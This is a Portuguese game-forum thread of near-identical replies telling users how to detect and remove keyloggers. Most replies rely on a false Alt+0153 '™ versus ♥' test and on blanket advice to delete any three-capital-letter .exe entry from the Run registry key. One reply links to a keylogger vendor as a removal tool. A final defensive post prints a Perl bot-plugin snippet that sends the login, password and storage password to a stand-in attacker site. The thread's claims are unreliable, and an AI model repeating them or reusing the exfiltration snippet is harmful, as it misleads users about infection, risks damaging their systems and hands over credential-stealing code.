como identificar e tirar um K.L

Primeiro abra seu Bloco de Notas e segure o ALT e aperte 0153 e solte , se sair ''™'' você não está infectado , se aparecer ''coração" ou ''?'' você está infectado.

Para remover keylogger , siga o processo abaixo :

Quote

1° Etapa: Vá em INICIAR, EXECULTAR e escreva REGEDIT.
2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAIS" da pasta SOFTWARE.
4° Etapa: Clique no "MAIS" da pasta MICROSOFT.
5° Etapa: Clique no "MAIS" da pasta WINDOWS.
6° Etapa: Clique no "MAIS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "MAIS" e sim na pasta RUN. Procure algum arquivo que tenha 3 letras maiusculas seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~ POL.exe ~ HGUS.exe .

Para você verificar se você esta infectado por Keylogger basta você abrir o seu bloco de notas, depois que você tenha feito precione a tecla Alt+0153 OBS: n° do lado direito do teclado, após você tenha feito isso ira aparecer ou um ™ ou um ♥, caso apareca um ™ você não esta infectado por keylogger, caso ao contrario infelizmente você esta. Mais fique tranquilo basta você seguir corretamente todos os procedimentos abaixo para você remover o keylogger do seu computador.

1° Etapa: Vá em INICIAR, EXECULTAR e escreva REGEDIT.
2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAiS" da pasta SOFTWARE.
4° Etapa: Clique no "MAiS" da pasta MICROSOFT.
5° Etapa: Clique no "MAiS" da pasta WINDOWS.
6° Etapa: Clique no "MAiS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "MAIS" e sim na pasta RUN.

Obs:
Procure algum arquivo que tenha 3 letras maiusculas seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~ POL.exe ~ HGUS.exe

[Tutorial] Removendo Keylogger.
Abra o Bloco de Notas, segure a tecla ALT depois tecle os numeros 0153, se aparecer " TM " você não foi infectado, mas se aparecer um coração preto " ? " você está infectado!

Quote

1° Etapa: Vá em INICIAR, EXECUTAR e escreva REGEDIT.
2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAiS" da pasta SOFTWARE.
4° Etapa: Clique no "MAiS" da pasta MICROSOFT.
5° Etapa: Clique no "MAiS" da pasta WINDOWS.
6° Etapa: Clique no "MAiS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "MAIS" e sim na pasta RUN. Procure algum arquivo que tenha 3 letras maiusculas seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~ POL.exe ~ HGUS.exe

Segue também uma vídeo aula :

Verificando se à Keylloger no computador :
Primeiro abra seu Bloco de Notas e segure o ALT e aperte 0153 e solte, se sair ''™'' você não está infectado , se aparecer ''♥'' ou ''?'' você está infectado.

Removendo KeyLogger :

1° Etapa: Vá em INICIAR, EXECULTAR e escreva REGEDIT.
2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAiS" da pasta SOFTWARE.
4° Etapa: Clique no "MAiS" da pasta M ICROSOFT.
5° Etapa: Clique no "MAiS" da pasta WINDOWS.
6° Etapa: Clique no "MAiS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "MAIS" e sim na pasta RUN.
Procure algum arquivo que tenha 3 letras maiusculas
seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~
POL.exe ~ HGUS.exe.


Caso quando finalizar os procedimentos, e seu computador
esteja infectado, basta realizar o download abaixo, para remover o kl.
http://www.ardamax.com/download.html

Para saber dê Alt+0+1+5+3 , se aparecer o ™ você não está infectado , já se aparecer o ♥ você está infectado .
Caso esteja , siga abaixo para retirar o KL de sua maquina .

Quote

1°Passo: Vá em INICIAR, EXECULTAR e escreva REGEDIT.
2°Passo: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3°Passo: Clique no "MAiS" da pasta SOFTWARE.
4°Passo: Clique no "MAiS" da pasta MICROSOFT.
5°Passo: Clique no "MAiS" da pasta WINDOWS.
6°Passo: Clique no "MAiS" da pasta CURRENTVERSION.
7°Passo: Agora não clique no "MAIS" e sim na pasta RUN. Procure algum arquivo que tenha 3 letras maiusculas seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~ POL.exe ~ HGUS.exe.

Abra o seu bloco de notas, e pressione ALT+0+1+5+3 se aparecer ™ você está livre da ameaça, caso apareça um ♥ você está infectado pelo vírus.

Para deletá-lo, basta seguir o que se pede abaixo:

Quote

1° Etapa: Vá em INICIAR, EXECULTAR e escreva REGEDIT.
2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAiS" da pasta SOFTWARE.
4° Etapa: Clique no "MAiS" da pasta MICROSOFT.
5° Etapa: Clique no "MAiS" da pasta WINDOWS.
6° Etapa: Clique no "MAiS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "MAIS" e sim na pasta RUN. Procure algum arquivo que tenha 3 letras maiusculas seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~ POL.exe ~ HGUS.exe

Qualquer programa que tenha LETRAS MAIÚSCULAS seguido de .exe DELETE!
Fazendo isso, você LIMPOU seu computador de um Keylogger.
Antes de mais nada, para evitar esse transtorno, é sempre bom deixar seu FireWall ativado e ter um bom ant vírus.

Veja se você está com o vírus keylogguer basta está abrindo seu bloco de notas de seu computador
ao abrir o bloco de notas aperta 'ATL+0+1+5+3 tudo junto,se no momento que você executar isso aparecer ™
e porque você não está infectado pelo vírus mas se aparecer no momento que você executou aparecer um coração preto
isso está disendo que você está infectado pelo vírus então para tirar o mesmo veja abaixo:



Para remover o vírus de seu computador basta proceder com ás informações abaixo.

1° Etapa: Vá em INICIAR, EXECULTAR e escreva REGEDIT. 2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAiS" da pasta SOFTWARE. 4° Etapa: Clique no "MAiS" da pasta MICROSOFT.
5° Etapa: Clique no "MAiS" da pasta WINDOWS. 6° Etapa: Clique no "MAiS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "MAIS" e sim na pasta RUN. Procure algum arquivo que tenha 3 letras maiusculas
seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~ POL.exe ~ HGUS.exe .

Para verificar se você esta infectado por KL basta você fazer o seguinte:
vá ao seu bloco de notas e digite alt+0153 se aparecer (™) você não esta infectado porem se aparecer um [?] você esta infelizmente infectado.
Caso esteja infectado com o KL, veja abaixo como estar removendo o mesmo manualmente:

Spoiler

1° Etapa: Vá em INICIAR, EXECUTAR e escreva REGEDIT.
2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAiS" da pasta SOFTWARE.
4° Etapa: Clique no "MAiS" da pasta MICROSOFT.
5° Etapa: Clique no "MAiS" da pasta WINDOWS.
6° Etapa: Clique no "MAiS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "MAIS" e sim na pasta RUN. Procure algum arquivo que tenha 3 letras maiusculas seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~ POL.exe ~ HGUS.exe

Qualquer programa que tenha LETRAS MAIÚSCULAS seguido de .exe DELETE

Para você saber se você esta infectado com KL, você terá que abrir o bloco de notas, apertar as teclar CTRL + 0153, se aparecer "™", significa que você não esta infectado, porém, caso apareça "♥", significa que você esta infectado, enfim, abaixo segue o método para você remover KL da sua maquina:

Quote

1° Etapa: Vá em INICIAR, EXECULTAR e escreva REGEDIT.
2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAiS" da pasta SOFTWARE.
4° Etapa: Clique no "MAiS" da pasta MICROSOFT.
5° Etapa: Clique no "MAiS" da pasta WINDOWS.
6° Etapa: Clique no "MAiS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "+" e sim na pasta RUN. Procure algum arquivo que tenha 3 letras maiusculas seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~ POL.exe ~ HGUS.exe.

Para você está sabendo se sua máquina possui keylogger, basta está abrindo seu bloco de notas, logo após abrir, utilize as seguintes teclas juntamente ' ATL+0+1+5+3', após utilizar as teclas juntas aparecer ™ você não está infectado, porém aparecer um coração preto você se encontra infectado pelo vírus, porém agora nossa administração mudou a orientação diante do vírus keylogger, ou seja, para que você possa está livre do mesmo, é aconselhavél você está realizando a formatação de sua máquina, para que você não possa correr riscos de contér o vírus ainda em sua máquina.

Para você verificar se você esta infectado por K.L basta você abrir o seu bloco de notas, depois que você tenha feito precione a tecla Alt+0153 OBS: n° do lado direito do teclado, após você tenha feito isso ira aparecer ou um ™ ou um ♥, caso apareca um ™ você não esta infectado por K.L, caso ao contrario infelizmente você esta.

Abra o bloco de notas e aperte CTRL + 0153, se aparecer "™", significa que você não esta infectado, porém, caso apareça "♥", significa que você esta infectado,
Quote
1° Etapa: Vá em INICIAR, EXECUTAR e escreva REGEDIT.
2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAiS" da pasta SOFTWARE.
4° Etapa: Clique no "MAiS" da pasta MICROSOFT.
5° Etapa: Clique no "MAiS" da pasta WINDOWS.
6° Etapa: Clique no "MAiS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "MAIS" e sim na pasta RUN. Procure algum arquivo que tenha 3 letras maiusculas seguindo com .exe e se possuir delete. Exemplo : BKP.exe ~ AKL.exe ~ POL.exe ~ HGUS.exe

Para vizualisar se seu PC encontra-se com KeyLogger, basta pressionar as teclas Alt + 0153.

Caso esteja com o tal, para remover basta seguir abaixo!

1° Etapa: Vá em INICIAR, EXECULTAR e escreva REGEDIT.
2° Etapa: Clique no "MAIS" da pasta HKEY_LOCAL_MACHINE.
3° Epata: Clique no "MAiS" da pasta SOFTWARE.
4° Etapa: Clique no "MAiS" da pasta MICROSOFT.
5° Etapa: Clique no "MAiS" da pasta WINDOWS.
6° Etapa: Clique no "MAiS" da pasta CURRENTVERSION.
7° Etapa: Agora não clique no "MAIS" e sim na pasta RUN.

Atenciosamente, Drink_-
MuAwaY - Projetando e Contruindo sua diversão!

[Tutorial]Como identificar bot com keylogger !
Como detectar um keylogger "indetectável", já se tratando de bots?
Os keyloggers usados em bots são dividos muitas vezes em 3 partes, sendo elas:

1. Plugin em .pl que vem com o bot.
2. Arquivo .php que fica localizado no site do "hacker/cracker ( na verdade é lammer )".
3. Arquivo .txt que fica também no site do atacante.

Tudo isso funciona da seguinte maneira:
Ao rodar o bot, o plugin com código malicioso é executado, ele pega suas informações como: Login, senha e senha de armazém, salva em algumas variáveis e envia para o site do atacante.
O arquivo .php escreve todas essas informações no .txt, e assim o atacante pega suas informações.

Para detectar esse código malicioso em .pl ( perls ), vá na pasta de seu openkore e em seguida entre na pasta plugins, lá como já sabem, estão seus plugins.
Abra um por um, aperte CTRL+F e procure por este código:

Arquivo.pl




use LWP::UserAgent;
use Utils qw(urlencode);
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
my $usuario = $config{'username'};
$usuario =~ s/#/:/;
my $senha = $config{'password'};
$senha =~ s/#/:/;
my $kafra = $config{'storageAuto_password'};
$kafra =~ s/#/:/;
my $response = $ua->get("http://www.atacante.com/key_strokes.php?keylog=$usuario $senha $kafra")


Se por acaso encontrar este código, significa que o bot tem "keylogger", e certamente se executa-lo todas as suas informações serão enviadas para o site do atacante. Para remover o keylogger, apenas apague essas linhas.

Para verificar se você esta infectado por keylogger vá em seu bloco de notas e digite alt+0153 se aparecer ™ você não esta infectado porem se aparecer um simbolo como esse "♥" infelizmente você esta infectado.
Para remove-lo aconselho a formatar o seu computador.

Atenciosamente, Light_CL
Equipe MuAwaY - Projetando & construindo a sua diversão!

Dúvida respondida

Caso precise reabrir o tópico, me envie uma MP solicitando.